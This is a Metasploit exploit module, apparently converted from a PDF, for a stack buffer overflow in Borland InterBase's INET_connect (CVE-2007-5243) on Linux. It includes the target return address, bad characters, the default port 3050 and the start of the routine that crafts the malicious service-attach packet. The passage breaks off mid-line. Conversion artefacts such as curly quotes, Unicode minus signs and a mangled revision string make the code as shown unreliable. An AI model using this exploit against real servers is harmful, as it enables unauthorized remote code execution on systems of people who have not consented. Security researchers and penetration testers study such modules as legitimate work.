1 ##
2 # $Id$
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12
13 require ’msf/core’
14
15
16 class Metasploit3 < Msf::Exploit::Remote
17
18
include Msf::Exploit::Remote::Tcp
19
20
def initialize(info = {})
21
super(update_info(info,
22
’Name’
=> ’Borland InterBase INET_connect() Buffer Overflow’,
23
’Description’
=> %q{
24
This module exploits a stack overflow in Borland InterBase
25
by sending a specially crafted service attach request.
26
},
27
’Version’
=> ’$Revision__DOCTEXT__rsquo;,
28
’Author’
=>
29
[
30
’ramon’,
31
’Adriano Lima <adriano@risesecurity.org>’,
32
],
33
’Arch’
=> ARCH_X86,
34
’Platform’
=> ’linux’,
35
’References’
=>
36
[
37
[ ’CVE’, ’2007−5243’ ],
38
[ ’OSVDB’, ’38605’ ],
39
[ ’BID’, ’25917’ ],
40
[ ’URL’, ’http://www.risesecurity.org/advisories/RISE−2007002.txt’ ],
41
],
42
’Privileged’
=> true,
43
’License’
=> MSF_LICENSE,
44
’Payload’
=>
45
{
46
’Space’ => 512,
47
’BadChars’ => "\x00\x2f\x3a\x40\x5c",
48
},
49
’Targets’
=>
50
[
51
# 0x0804d2ee 5b5e5f5dc3
52
[
Page 1/3
Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow
Adriano Lima
10/03/2007
53
’Borland InterBase LI−V8.0.0.53 LI−V8.0.0.54 LI−V8.1.0.253’,
54
{ ’Ret’ => 0x0804d2ee }
55
],
56
],
57
’DefaultTarget’
=> 0
58
))
59
60
register_options(
61
[
62
Opt::RPORT(3050)
63
],
64
self.class
65
)
66
67
end
68
69
def exploit
70
71
connect
72
73
# Attach database
74
op_attach = 19
75
76
# Create database
77
op_create = 20
78
79
# Service attach
80
op_service_attach = 82
81
82
length = 161
83
remainder = length.remainder(4)
84
padding = 0
85
86
if remainder > 0
87
padding = (4 − remainder)
88
end
89
90
buf = ’’
91
92
# Operation/packet type
93
buf << [op_service_attach].pack(’N’)
94
95
# Id
96
buf << [0].pack(’N’)
97
98
# Length
99
buf << [length].pack(’N’)
100
101
# Random alpha data
102
buf << rand_text_alpha(length −